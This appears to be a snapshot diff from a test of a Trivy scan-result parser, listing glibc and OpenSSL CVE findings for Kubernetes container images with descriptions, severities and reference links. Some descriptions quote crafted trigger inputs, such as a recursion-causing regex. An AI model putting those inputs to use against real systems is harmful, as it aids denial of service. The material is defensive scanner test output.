"https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "use-after-free following BIO_new_NDEF", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - "https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", - ], - }, - "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - ], - }, - "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "X.400 address type confusion in X.509 GeneralName", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://bugzilla.redhat.com/2164494", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", - ], - }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": 